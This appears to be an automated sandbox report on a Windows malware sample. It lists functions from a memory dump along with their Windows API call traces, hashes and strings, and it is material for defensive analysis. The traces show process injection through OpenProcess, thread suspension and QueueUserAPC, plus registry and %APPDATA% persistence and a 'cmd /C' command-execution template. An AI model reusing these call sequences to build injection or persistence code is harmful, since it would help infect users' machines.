  • Opcode ID: f2d70ba1db336b0a4ac6973dd472b45d7992a95be766767dbdcbf8c120d66562
  • Instruction ID: 50267dbfc79e7e53958b6cba9acd06bd661d4a86ea51a5bd4c245a4c386a7ff5
  • Opcode Fuzzy Hash: 8DF095610946C3D35417545580B03B89004AFD22F2C4D43FAE9303D1CB7E1235D7765F
  • Instruction Fuzzy Hash: 50267dbfc79e7e53958b6cba9acd06bd661d4a86ea51a5bd4c245a4c386a7ff5
APIs
    • Part of subcall function 001DDAD4: memcpy.NTDLL(00000000,00000084,00000084,001CD4DC,00000000,00000000,001DDB4C,001CD4DC,001CD4DC,001CD4DC,00000000,?,?,001C4CB1,00000000,00000001), ref: 001DDAF2
    • Part of subcall function 001DDAD4: memset.NTDLL ref: 001DDB24
  • RtlAllocateHeap.NTDLL(00000000,00000008,-00000008), ref: 001C3FE9
  • lstrcmpi.KERNEL32(00000000,001ED273), ref: 001C4009
    • Part of subcall function 001C5816: lstrlen.KERNEL32(00000008,?,?,?,001C402D,00000000,00000000), ref: 001C5876
    • Part of subcall function 001C5816: HeapFree.KERNEL32(00000000,00000000), ref: 001C5898
    • Part of subcall function 001C5816: memcpy.NTDLL(00000000,00000000,00000000,?,?,?,001C402D,00000000,00000000), ref: 001C58AA
    • Part of subcall function 001C5816: lstrcpy.KERNEL32(00000020,00000008), ref: 001C58DC
    • Part of subcall function 001C5816: RtlEnterCriticalSection.NTDLL(001EB248), ref: 001C58E8
    • Part of subcall function 001C5816: Sleep.KERNEL32(0000000A), ref: 001C58F2
    • Part of subcall function 001C5816: RtlLeaveCriticalSection.NTDLL(001EB248), ref: 001C5940
    • Part of subcall function 001C3F4D: RegCloseKey.ADVAPI32(?,?,?,001C403B,00000000,?,?,00000000,00000000,-00000008), ref: 001C3F87
  • HeapFree.KERNEL32(00000000,00000000,00000000), ref: 001C404E
  • HeapFree.KERNEL32(00000000,?,?), ref: 001C405F
    • Part of subcall function 001DD67D: RtlEnterCriticalSection.NTDLL(001EB184), ref: 001DD68A
    • Part of subcall function 001DD67D: Sleep.KERNEL32(0000000A,?,?,001DD703,001EB1C8,001EAD10,00000000,001DDF84), ref: 001DD694
    • Part of subcall function 001DD67D: RtlLeaveCriticalSection.NTDLL(001EB184), ref: 001DD6E3
Strings
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001C4202, Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 63 Total matches: 53memoryregistry
Similarity
  • Total matches: 53
  • API ID: HeapFreeRegCloseKeyRegOpenKeyRtlAllocateHeap
  • String ID: Main
  • API String ID: 1238789381-521822810
  • Opcode ID: 430bf3c3e099aaf98ba0d13378e5d8da2de179d3274a2f5d09db6df723472999
  • Instruction ID: 8f29cc0f23f969ede819062a95f7fcd74d74c9a74bdfea75fafa15d21f68d3cc
  • Opcode Fuzzy Hash: CAE026B00A45C5AA403B7C81647B2F29410F9A08C20CD976BEE009F28CAE4670A27B9A
  • Instruction Fuzzy Hash: 8f29cc0f23f969ede819062a95f7fcd74d74c9a74bdfea75fafa15d21f68d3cc
APIs
  • RegOpenKeyA.ADVAPI32(80000001,?), ref: 001C4220
  • RtlAllocateHeap.NTDLL(00000000,?), ref: 001C4256
  • HeapFree.KERNEL32(00000000,?), ref: 001C428F
  • RegCloseKey.ADVAPI32(?), ref: 001C4298
Strings
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001C29BF, Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 41 Total matches: 45memorystring
Similarity
  • Total matches: 45
  • API ID: CreateDirectoryHeapFreeRtlAllocateHeaplstrlen
  • String ID: %APPDATA%\Microsoft\
  • API String ID: 3959905781-2699254172
  • Opcode ID: a91e168cb75582dc69dc678417b6008db4073c04297a41e19573c560bdc487dc
  • Instruction ID: cffe0b6492667c1a66e0568daab83b9343bd146d6441e28ba88ab90f7e1d944e
  • Opcode Fuzzy Hash: 10D05EB0444802AB953BA426806A739884A7F823D0C5E7536E9404A26FBB9362956E6A
  • Instruction Fuzzy Hash: cffe0b6492667c1a66e0568daab83b9343bd146d6441e28ba88ab90f7e1d944e
APIs
  • RtlAllocateHeap.NTDLL(00000000,00010000,00000000), ref: 001C29D8
    • Part of subcall function 001D6CC6: lstrlen.KERNEL32(?,?,00000000,?,00000000,001C7543,?,?,?,?,?,?,?,?,?,001C1255), ref: 001D6CD5
  • CreateDirectoryW.KERNEL32(00000000,00000000,?,?,001C2A7A,00000000), ref: 001C2A06
  • lstrlenW.KERNEL32(00000000,?,?,001C2A7A,00000000), ref: 001C2A12
  • HeapFree.KERNEL32(00000000,00000000), ref: 001C2A2A
Strings
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001D9EAA, Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 33 Total matches: 56memorystring
Similarity
  • Total matches: 56
  • API ID: lstrlen$RtlAllocateHeap
  • String ID: [FILE]$DllRegisterServer
  • API String ID: 2544908171-3029713317
  • Opcode ID: 2d4b95e8c34fd7eb35c32aaba08f5fcf9921a6e8c8be63207aa385bfa2f516c2
  • Instruction ID: 5cabe30f11294075a22546247cc9a04f0ebb488a8614786e1935660b83a97d3e
  • Opcode Fuzzy Hash: 73C012709914038B04177926842423CC68A39957E540E0619E8473611A5B0302CD5A1E
  • Instruction Fuzzy Hash: 5cabe30f11294075a22546247cc9a04f0ebb488a8614786e1935660b83a97d3e
APIs
  • lstrlenW.KERNEL32(00000000,00000000,00000000,.dll,001C2B1B,00000000,.dll,00000094,00001000,00000000,00000000,00001000), ref: 001D9EB8
  • lstrlen.KERNEL32(DllRegisterServer), ref: 001D9EC6
  • RtlAllocateHeap.NTDLL(00000000,00000022), ref: 001D9EDB
Strings
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001CAF14, Relevance: 7.7, APIs: 5, Instructions: 174 Total matches: 40memory
Similarity
  • Total matches: 40
  • API ID: HeapFreeInterlockedExchangeRtlAllocateHeapmemcpywsprintf
  • String ID:
  • API String ID: 3372225998-0
  • Opcode ID: 61e3c6596c7711a58e405f94e11cad7776fca466765ac99ea6157a7d77fb77b6
  • Instruction ID: da8d2039801b4c8d43c4b5d75199c0239940cb1666a4492243b1b8028872bfb2
  • Opcode Fuzzy Hash: B6110E75048A40CF89337492402A6BBDA81BD914C798C9763E90C3A5AF4903F29B7F07
  • Instruction Fuzzy Hash: da8d2039801b4c8d43c4b5d75199c0239940cb1666a4492243b1b8028872bfb2
APIs
  • RtlAllocateHeap.NTDLL(00000000,?), ref: 001CAF93
    • Part of subcall function 001D8FBB: GetLocalTime.KERNEL32(?), ref: 001D8FC5
    • Part of subcall function 001D8FBB: wsprintfA.USER32 ref: 001D8FF1
  • HeapFree.KERNEL32(00000000,00000000), ref: 001CB0F1
    • Part of subcall function 001C7CFB: StrChrA.SHLWAPI(00000001,0000000D), ref: 001C7D45
  • wsprintfA.USER32 ref: 001CB04B
  • memcpy.NTDLL(00000000,?,?), ref: 001CB090
  • InterlockedExchange.KERNEL32(001EAFEC,00000000), ref: 001CB0AE
    • Part of subcall function 001CBD48: lstrlen.KERNEL32(?,00000000,?,?,?,?,?,?,001CD153,00000125,?,00000004,00000000), ref: 001CBD78
    • Part of subcall function 001CBD48: RtlAllocateHeap.NTDLL(00000000,?,00000000), ref: 001CBD8E
    • Part of subcall function 001CBD48: memcpy.NTDLL(00000010,?,00000000,?,?,?,?,001CD153), ref: 001CBDC4
    • Part of subcall function 001CBD48: memcpy.NTDLL(00000010,00000000,?), ref: 001CBDDF
    • Part of subcall function 001CBD48: CallNamedPipeA.KERNEL32(00000000,?,?,00000010,00000119,00000001), ref: 001CBDFD
    • Part of subcall function 001CBD48: GetLastError.KERNEL32 ref: 001CBE07
    • Part of subcall function 001CBD48: HeapFree.KERNEL32(00000000,00000000), ref: 001CBE2D
    • Part of subcall function 001C5B7B: RtlAllocateHeap.NTDLL(00000000,?,00000000), ref: 001C5BA4
    • Part of subcall function 001C5B7B: memcpy.NTDLL(00000000,?,?), ref: 001C5BB7
    • Part of subcall function 001C5B7B: RtlEnterCriticalSection.NTDLL(001EB248), ref: 001C5BC8
    • Part of subcall function 001C5B7B: RtlLeaveCriticalSection.NTDLL(001EB248), ref: 001C5BDD
    • Part of subcall function 001C5B7B: HeapFree.KERNEL32(00000000,00000000,?), ref: 001C5C15
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001C8B4E, Relevance: 7.6, APIs: 5, Instructions: 125 Total matches: 56memory
Similarity
  • Total matches: 56
  • API ID: HeapFreememcpy$RtlAllocateHeap
  • String ID:
  • API String ID: 1281497405-0
  • Opcode ID: c91cc279de764e5f2579d6076ec579c7e1ff7f10485d5d5ea4a8a547ad6caca9
  • Instruction ID: 3ae8df9311abcb48d6f96013da2b6f76f4bc533e0507b6b7ad3ca337a4177261
  • Opcode Fuzzy Hash: D1014E13C804C3878807342E9024AB8C449BE822C0DCDD316AA081C13F8BA232B7764F
  • Instruction Fuzzy Hash: 3ae8df9311abcb48d6f96013da2b6f76f4bc533e0507b6b7ad3ca337a4177261
APIs
    • Part of subcall function 001C8692: RtlAllocateHeap.NTDLL(00000000,?), ref: 001C86CC
  • RtlAllocateHeap.NTDLL(00000000,001E5065,?), ref: 001C8BEE
  • memcpy.NTDLL(00000000,00000000,00000000), ref: 001C8C05
  • HeapFree.KERNEL32(00000000,00000000), ref: 001C8C18
  • memcpy.NTDLL(00000000,?,?), ref: 001C8C27
  • HeapFree.KERNEL32(00000000,00000000,?), ref: 001C8C8B
    • Part of subcall function 001D959E: lstrlen.KERNEL32(?,001EAC78,00000000,00000000,001C4C52,00000000,00000000,00000000,00000001,?,?,001CD506,00000000,00000000), ref: 001D95A7
    • Part of subcall function 001D959E: memcpy.NTDLL(00000000,?,00000000,00000001,?,?,001CD506,00000000,00000000,?,?,00000000,001CD6F9), ref: 001D95CA
    • Part of subcall function 001D959E: memset.NTDLL ref: 001D95D9
    • Part of subcall function 001DAA89: RtlLeaveCriticalSection.NTDLL(?), ref: 001DAB06
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001C45F0, Relevance: 7.6, APIs: 5, Instructions: 121 Total matches: 58memoryregistrysynchronization
Similarity
  • Total matches: 58
  • API ID: HeapFree$RegCloseKeyWaitForSingleObject
  • String ID:
  • API String ID: 3052965740-0
  • Opcode ID: d3c070adaf0f083c3fd626d879ba680c8654bd575e600ed9f9379d1952a7449c
  • Instruction ID: ae659000fd8a6ff0622346f66fb9775bf8617b043a7e92e8c3d009521b2ea922
  • Opcode Fuzzy Hash: 1B01F521055AD313C12BA88192BA3FA8505BF829E1D4D1737FEB81E18C5F4721E6A707
  • Instruction Fuzzy Hash: ae659000fd8a6ff0622346f66fb9775bf8617b043a7e92e8c3d009521b2ea922
APIs
    • Part of subcall function 001C3BF0: RegCreateKeyA.ADVAPI32(80000001,001EB004,?), ref: 001C3C05
    • Part of subcall function 001C3BF0: RegOpenKeyA.ADVAPI32(80000001,001EB004,?), ref: 001C3C12
    • Part of subcall function 001C3BF0: lstrlen.KERNEL32(001EB004,00000000,00000000,00000000,?,?,?,001C3C71,00000000,00000000,00000000,00000001,?,?,?,001C4C86), ref: 001C3C33
  • HeapFree.KERNEL32(00000000,?), ref: 001C46AF
  • WaitForSingleObject.KERNEL32(00000000), ref: 001C4713
  • HeapFree.KERNEL32(00000000,?), ref: 001C473C
  • HeapFree.KERNEL32(00000000,00000000), ref: 001C474C
  • RegCloseKey.ADVAPI32(?,?,?,00000000,001CB4E0,00000000,00000000,?,001CD6FE), ref: 001C4755
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001C7878, Relevance: 7.6, APIs: 5, Instructions: 107 Total matches: 58memorystring
Similarity
  • Total matches: 58
  • API ID: HeapFree$RtlAllocateHeaplstrlenwsprintf
  • String ID:
  • API String ID: 4063120414-0
  • Opcode ID: 82a566ac4b7e44f40389d82a26e71ca4d0b382ca24f9de814279e5df00d9b999
  • Instruction ID: ea15a0fccfaea50bf9a426a543ac3d3c6aed45562802de59e2cba04bd230a37d
  • Opcode Fuzzy Hash: 10F0F4A4112C418A8C56A6F1989CB7852C85B925FDD4E3313A76C314EB3B13335EBE4D
  • Instruction Fuzzy Hash: ea15a0fccfaea50bf9a426a543ac3d3c6aed45562802de59e2cba04bd230a37d
APIs
    • Part of subcall function 001D7471: GetCurrentThreadId.KERNEL32(?,?,?,?,?,?,001C11C5,000004D2), ref: 001D74A9
    • Part of subcall function 001D7471: GetSystemTimeAsFileTime.KERNEL32(?,?,?,?,?,?,?,001C11C5,000004D2), ref: 001D74B5
    • Part of subcall function 001D7471: GetTempFileNameA.KERNEL32(00000000,00000000,?,00000000), ref: 001D74C3
    • Part of subcall function 001D7471: lstrcpy.KERNEL32(00000000), ref: 001D74DE
    • Part of subcall function 001C77DE: RtlAllocateHeap.NTDLL(00000000,00000020), ref: 001C7804
    • Part of subcall function 001C77DE: HeapFree.KERNEL32(00000000,?,00000000), ref: 001C7868
  • lstrlen.KERNEL32(00000000,001ECDBE,00000000,001ECDAC,00000000,001ECD98,00000000,001ECE3B,00000000,001ECE30,00000000,001ECD88,00000000,00002334), ref: 001C792A
  • RtlAllocateHeap.NTDLL(00000000,-0000000C), ref: 001C793F
  • wsprintfA.USER32 ref: 001C7954
    • Part of subcall function 001C7422: memset.NTDLL ref: 001C743A
    • Part of subcall function 001C7422: lstrlenW.KERNEL32(00000000,00000000,00000000,001EAD10,00000000,cmd /C "%s> %s1"), ref: 001C7473
    • Part of subcall function 001C7422: wcstombs.NTDLL ref: 001C747D
    • Part of subcall function 001C7422: CreateProcessA.KERNEL32(00000000,001C7831,00000000,00000000,00000000,0C000000,00000000,?,00000044,?), ref: 001C74B1
    • Part of subcall function 001C7422: WaitForMultipleObjects.KERNEL32(00000002,?,00000000,000000FF), ref: 001C74D2
    • Part of subcall function 001C7422: GetExitCodeProcess.KERNEL32(?,?), ref: 001C74EF
    • Part of subcall function 001C7422: GetLastError.KERNEL32 ref: 001C7507
  • HeapFree.KERNEL32(00000000,00000000,00000000), ref: 001C796E
    • Part of subcall function 001C7664: RtlAllocateHeap.NTDLL(00000000,00000000), ref: 001C76B4
    • Part of subcall function 001C7664: GetLastError.KERNEL32(?,00000000,001C797E), ref: 001C76E5
    • Part of subcall function 001C7664: HeapFree.KERNEL32(00000000,00000000), ref: 001C76F7
    • Part of subcall function 001C7664: HeapFree.KERNEL32(00000000,001C797E), ref: 001C770C
  • HeapFree.KERNEL32(00000000,00000000), ref: 001C7998
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001C439B, Relevance: 7.6, APIs: 5, Instructions: 98 Total matches: 56timememory
Similarity
  • Total matches: 56
  • API ID: CreateWaitableTimerGetLastErrorGetSystemTimeAsFileTimeHeapFreeOpenWaitableTimer
  • String ID:
  • API String ID: 1165046961-0
  • Opcode ID: dcf0f1391520f43fe6097fd0f752f71d1dc6f160b6cfea933156b7ea3217ac6e
  • Instruction ID: 47380e5463a91fa5f58a51e79f45711cdea6db2302c913f91e1116e2b5f0794b
  • Opcode Fuzzy Hash: 3BF02BA00A858783E07B64608177BB58300EBC25D5D8C2733F65D5DB5D8F46B1A2FA25
  • Instruction Fuzzy Hash: 47380e5463a91fa5f58a51e79f45711cdea6db2302c913f91e1116e2b5f0794b
APIs
  • OpenWaitableTimerA.KERNEL32(00100002,00000000,?), ref: 001C43B2
  • CreateWaitableTimerA.KERNEL32(001EB0D8,?,?), ref: 001C43D1
  • GetLastError.KERNEL32 ref: 001C43E1
    • Part of subcall function 001C3C55: RegQueryValueExA.KERNEL32(00000000,001CD4DC,00000000,001CD4DC,00000000,?,00000000,00000000,00000000,00000000,00000001,?,?,?,001C4C86,001EC1F9), ref: 001C3C8D
    • Part of subcall function 001C3C55: RtlAllocateHeap.NTDLL(00000000,?), ref: 001C3CA1
    • Part of subcall function 001C3C55: HeapFree.KERNEL32(00000000,?), ref: 001C3CD7
    • Part of subcall function 001C3C55: RegCloseKey.ADVAPI32(00000000,?,?,?,001C4C86,001EC1F9,001CD4DC,00000000,00000000,00000000,00000001,?,?,?,001CD4DC,00000000), ref: 001C3CE5
  • GetSystemTimeAsFileTime.KERNEL32(?,00000000,00000002,?), ref: 001C4428
  • HeapFree.KERNEL32(00000000,00000002,00000000), ref: 001C445C
    • Part of subcall function 001C4349: GetSystemTimeAsFileTime.KERNEL32(?), ref: 001C4356
    • Part of subcall function 001C4349: SetWaitableTimer.KERNEL32(?,?,00000000,00000000,00000000,00000000), ref: 001C4390
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001C9F0B, Relevance: 7.6, APIs: 5, Instructions: 95 Total matches: 59memorystring
Similarity
  • Total matches: 59
  • API ID: HeapFreeRtlAllocateHeaplstrcpylstrcpynlstrlen
  • String ID:
  • API String ID: 2577868549-0
  • Opcode ID: 1d80e047f999f10d401b9f46cfff4084342c566a149a0ba19b39b0a0f7985056
  • Instruction ID: 2369ec942959bcc0f81c5e1f9b71a5b6904734b35236ac73d6e48e3a05a83d19
  • Opcode Fuzzy Hash: C6F08B2B448E429BC027204202A67D8E71CBB818DAC4D8B319884795AE2EC272225B0A
  • Instruction Fuzzy Hash: 2369ec942959bcc0f81c5e1f9b71a5b6904734b35236ac73d6e48e3a05a83d19
APIs
  • RtlAllocateHeap.NTDLL(00000000,00000007), ref: 001C9F8D
  • lstrcpy.KERNEL32(00000000,001EC424), ref: 001C9F9F
  • lstrcpyn.KERNEL32(00000006,?,00000001,?,?,?,?,?,00000000,00000000,?), ref: 001C9FAC
  • lstrlen.KERNEL32(001EC424,?,?,?,?,?,00000000,00000000,?), ref: 001C9FBE
    • Part of subcall function 001CA73F: RtlAllocateHeap.NTDLL(00000000,-00000005), ref: 001CA760
    • Part of subcall function 001CA73F: wsprintfA.USER32 ref: 001CA775
    • Part of subcall function 001CA73F: RegCreateKeyA.ADVAPI32(80000001,001EB240,00000000), ref: 001CA78D
    • Part of subcall function 001CA73F: RegCloseKey.ADVAPI32(?), ref: 001CA7B5
    • Part of subcall function 001CA73F: HeapFree.KERNEL32(00000000,00000000), ref: 001CA7C4
    • Part of subcall function 001CAF14: RtlAllocateHeap.NTDLL(00000000,?), ref: 001CAF93
    • Part of subcall function 001CAF14: wsprintfA.USER32 ref: 001CB04B
    • Part of subcall function 001CAF14: memcpy.NTDLL(00000000,?,?), ref: 001CB090
    • Part of subcall function 001CAF14: InterlockedExchange.KERNEL32(001EAFEC,00000000), ref: 001CB0AE
    • Part of subcall function 001CAF14: HeapFree.KERNEL32(00000000,00000000), ref: 001CB0F1
  • HeapFree.KERNEL32(00000000,00000000,00000000), ref: 001C9FEF
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001C44E2, Relevance: 7.6, APIs: 5, Instructions: 90 Total matches: 117synchronization
Similarity
  • Total matches: 117
  • API ID: GetLastError$CloseHandleReleaseMutexWaitForMultipleObjects
  • String ID:
  • API String ID: 981764843-0
  • Opcode ID: e0028ebea731b05e1f81d164d1b0c22b432d0313b7510209d972350b2e9e1cbf
  • Instruction ID: 983f2bdd78a01378a5524cb3713f7215791f28ca6a77dfb9313747591b0c8092
  • Opcode Fuzzy Hash: 63F06276110C810BCE276554A46279A5A106FC23F048C1753FFF66A1EF1B527AD21B8A
  • Instruction Fuzzy Hash: 983f2bdd78a01378a5524cb3713f7215791f28ca6a77dfb9313747591b0c8092
APIs
    • Part of subcall function 001C44A4: OpenMutexA.KERNEL32(00100001,00000000,?), ref: 001C44B0
    • Part of subcall function 001C44A4: SetLastError.KERNEL32(000000B7,?,001C44F5), ref: 001C44C1
    • Part of subcall function 001C44A4: CreateMutexA.KERNEL32(001EB0D8,00000000,?,?,001C44F5), ref: 001C44D4
  • WaitForMultipleObjects.KERNEL32(00000002,?,00000000,000000FF), ref: 001C4515
  • CloseHandle.KERNEL32(00000000), ref: 001C45D3
    • Part of subcall function 001C439B: OpenWaitableTimerA.KERNEL32(00100002,00000000,?), ref: 001C43B2
    • Part of subcall function 001C439B: CreateWaitableTimerA.KERNEL32(001EB0D8,?,?), ref: 001C43D1
    • Part of subcall function 001C439B: GetLastError.KERNEL32 ref: 001C43E1
    • Part of subcall function 001C439B: GetSystemTimeAsFileTime.KERNEL32(?,00000000,00000002,?), ref: 001C4428
    • Part of subcall function 001C439B: HeapFree.KERNEL32(00000000,00000002,00000000), ref: 001C445C
  • GetLastError.KERNEL32 ref: 001C45BC
  • ReleaseMutex.KERNEL32(00000000), ref: 001C45C5
  • GetLastError.KERNEL32 ref: 001C45E0
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001CAD95, Relevance: 7.6, APIs: 5, Instructions: 85 Total matches: 58memorystring
Similarity
  • Total matches: 58
  • API ID: memcpy$HeapFreeRtlAllocateHeaplstrcmpi
  • String ID:
  • API String ID: 857938089-0
  • Opcode ID: 4b4a78c487d6048ee3f3895cdad3a98188a4a88c0ba2f47e4ae26dadc0163ad9
  • Instruction ID: 3f52a085e5dd49b5850e34594fd6f7df3e0d62c374d676f882949c6103c053a0
  • Opcode Fuzzy Hash: C5F09E214D05C251D61B10B45894B94E946FE823B3C8DA7379C047908B2A4221A9B5EF
  • Instruction Fuzzy Hash: 3f52a085e5dd49b5850e34594fd6f7df3e0d62c374d676f882949c6103c053a0
APIs
    • Part of subcall function 001C57CC: RtlEnterCriticalSection.NTDLL(001EB248), ref: 001C57D4
    • Part of subcall function 001C57CC: RtlLeaveCriticalSection.NTDLL(001EB248), ref: 001C57E9
    • Part of subcall function 001C57CC: InterlockedIncrement.KERNEL32(0000001C), ref: 001C5802
  • RtlAllocateHeap.NTDLL(00000000,?,001ED278), ref: 001CADC5
  • memcpy.NTDLL(00000000,?,?), ref: 001CADD6
    • Part of subcall function 001C5761: InterlockedDecrement.KERNEL32(0000001C), ref: 001C5765
  • lstrcmpi.KERNEL32(00000002,?), ref: 001CAE1C
  • memcpy.NTDLL(00000000,?,?), ref: 001CAE30
  • HeapFree.KERNEL32(00000000,00000000,001ED278), ref: 001CAE6F
    • Part of subcall function 001C7AF2: RegCreateKeyA.ADVAPI32(80000001,00000000,?), ref: 001C7B06
    • Part of subcall function 001C7AF2: memcpy.NTDLL(00000000,001C7C21,?,?,00000008,?,001C7C21,00000000,00000000,?), ref: 001C7B2F
    • Part of subcall function 001C7AF2: RegCloseKey.ADVAPI32(?,?,001C7C21,00000000,00000000,?,?,?,?,?,?,?,?,00000008,001C77AB,00000000), ref: 001C7B81
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001C59D7, Relevance: 7.6, APIs: 5, Instructions: 83 Total matches: 27memorytime
Similarity
  • Total matches: 27
  • API ID: GetSystemTimeAsFileTimeInterlockedIncrementRtlAllocateHeapRtlEnterCriticalSectionRtlLeaveCriticalSection
  • String ID:
  • API String ID: 2335115045-0
  • Opcode ID: 87b7f9457d6eb4fb8a765cd00379997a4ae998d37287d2c68f8de9ad653ea43e
  • Instruction ID: a533ae1a33582a8b524e606b503d101fc491c8f586016c526a9c3a1c080ca75d
  • Opcode Fuzzy Hash: 73F08BB11645925BD10230500D063B7F90AFBB13EAC4DFE12DD20342AB3F8321266BAC
  • Instruction Fuzzy Hash: a533ae1a33582a8b524e606b503d101fc491c8f586016c526a9c3a1c080ca75d
APIs
    • Part of subcall function 001DDA6F: lstrlen.KERNEL32(?,001EB160,001E5128,?,001DE5BF,?,00000000,001E5128,00000000,001EB16C,001EB16C,?,001DE11D,?,?,?), ref: 001DDA7B
  • RtlEnterCriticalSection.NTDLL(001EB248), ref: 001C5A01
  • RtlLeaveCriticalSection.NTDLL(001EB248), ref: 001C5A14
  • GetSystemTimeAsFileTime.KERNEL32(?), ref: 001C5A25
  • RtlAllocateHeap.NTDLL(00000000,001EB264,?), ref: 001C5A90
  • InterlockedIncrement.KERNEL32(001EB25C), ref: 001C5AA7
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001DC4E7, Relevance: 7.6, APIs: 5, Instructions: 81 Total matches: 95
Similarity
  • Total matches: 95
  • API ID: CloseHandleGetLastError$OpenProcess
  • String ID:
  • API String ID: 3618605412-0
  • Opcode ID: f3c28a13a8270d655170a0e3c90d88c5c03aaf1802dd5309b87f7072ec2badc3
  • Instruction ID: ee927bb26a947277b8e3b3d91228e1c9832b26c7ffbdb67feee30960427366c3
  • Opcode Fuzzy Hash: 13F09E78181666838027B06098507FBF645FE821CF6AC3610F6603108A47563AD76754
  • Instruction Fuzzy Hash: ee927bb26a947277b8e3b3d91228e1c9832b26c7ffbdb67feee30960427366c3
APIs
    • Part of subcall function 001D8325: GetModuleHandleA.KERNEL32(001EC01D,?,?,?,?,001C13BC,00000000,001EB090,00000000,?,?), ref: 001D833F
    • Part of subcall function 001D8325: GetProcAddress.KERNEL32(00000000,001EDA66,?,?,?,?,001C13BC,00000000,001EB090,00000000,?,?), ref: 001D8350
    • Part of subcall function 001D8325: OpenProcess.KERNEL32(00000400,00000000,?,?,?,?,?,001C13BC,00000000,001EB090,00000000,?,?), ref: 001D836D
    • Part of subcall function 001D8325: IsWow64Process.KERNELBASE(00000000,?,?,?,?,?,001C13BC,00000000,001EB090,00000000,?,?), ref: 001D837E
    • Part of subcall function 001D8325: CloseHandle.KERNEL32(00000000), ref: 001D8391
  • OpenProcess.KERNEL32(001F0FFF,00000000,?,?,?,?,00000001), ref: 001DC517
  • GetLastError.KERNEL32(?,?,00000001), ref: 001DC59A
    • Part of subcall function 001DC371: memset.NTDLL ref: 001DC393
    • Part of subcall function 001DC371: ResumeThread.KERNEL32(?,00000000,?,?,00000000,?,00010007,00000004,?), ref: 001DC42A
    • Part of subcall function 001DC371: WaitForSingleObject.KERNEL32(00000064), ref: 001DC438
    • Part of subcall function 001DC371: SuspendThread.KERNEL32(?), ref: 001DC450
    • Part of subcall function 001DC371: GetLastError.KERNEL32(00000000,?,00010007,00000004,?), ref: 001DC4C5
    • Part of subcall function 001DC371: ResumeThread.KERNEL32(00000004), ref: 001DC4D6
  • CloseHandle.KERNEL32(00000000), ref: 001DC592
  • CloseHandle.KERNEL32(?), ref: 001DC5AD
  • GetLastError.KERNEL32(?,?,00000001), ref: 001DC5B5
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001CB410, Relevance: 7.6, APIs: 5, Instructions: 74 Total matches: 26thread
Similarity
  • Total matches: 26
  • API ID: CloseHandleCreateThreadGetCommandLineGetLastErrorGetModuleHandle
  • String ID:
  • API String ID: 3688636283-0
  • Opcode ID: 8985e94ed4e404b0795d5a875a1daa6f27baf4ecdfa99c2ebdf40c8ebc5b8d94
  • Instruction ID: 283d28c9ebffde5815507237fddad0c111e69e01867ba4e75a4d178179002479
  • Opcode Fuzzy Hash: 55E0DCF28AC2C40BA8172662105D30B034AAB811E6AEC0393D361F00A6BB0F22DB5D4A
  • Instruction Fuzzy Hash: 283d28c9ebffde5815507237fddad0c111e69e01867ba4e75a4d178179002479
APIs
  • GetModuleHandleA.KERNEL32(001EC88E,00000000,00000000,?,001CD6FE,?,?,?,?,?,001CDB1F,?,?,?,?,001EC638), ref: 001CB44F
    • Part of subcall function 001C6112: RtlImageNtHeader.NTDLL(001CD6FE), ref: 001C6127
    • Part of subcall function 001C6112: VirtualAlloc.KERNEL32(00000000,01000000,00003000,00000040,?,?,00000001,001CD6FE,?,00000001,00000000,?,001CD6FE), ref: 001C61ED
  • GetCommandLineW.KERNEL32(00000000,00000000,?,001CD6FE,?,?,?,?,?,001CDB1F,?,?,?,?,001EC638), ref: 001CB466
  • CreateThread.KERNEL32(00000000,00000000,001C6C08,00000000,00000000,001CD6FE), ref: 001CB485
  • CloseHandle.KERNEL32(00000000), ref: 001CB490
  • GetLastError.KERNEL32(?,001CD6FE,?,?,?,?,?,001CDB1F,?,?,?,?,001EC638), ref: 001CB498
    • Part of subcall function 001C6241: GetModuleHandleA.KERNEL32(001EC065,00000000,001CB4C4,00000000,00000000,?,001CD6FE,?,?,?,?,?,001CDB1F,?), ref: 001C6247
    • Part of subcall function 001C6241: TlsAlloc.KERNEL32(?,001CD6FE,?,?,?,?,?,001CDB1F,?,?,?,?,001EC638), ref: 001C6253
    • Part of subcall function 001CB35F: CreateToolhelp32Snapshot.KERNEL32 ref: 001CB391
    • Part of subcall function 001CB35F: GetModuleHandleA.KERNEL32(001EC01D,001ED067,00000004,00000000,00000000,00000000,00000001), ref: 001CB3A8
    • Part of subcall function 001CB35F: GetProcAddress.KERNEL32(00000000), ref: 001CB3AF
    • Part of subcall function 001CB35F: Thread32First.KERNEL32(001CD6FE,0000001C), ref: 001CB3BF
    • Part of subcall function 001CB35F: OpenThread.KERNEL32(001F03FF,00000000,00000000,001CD6FE,0000001C), ref: 001CB3DA
    • Part of subcall function 001CB35F: QueueUserAPC.KERNEL32(?,00000000,00000000), ref: 001CB3EB
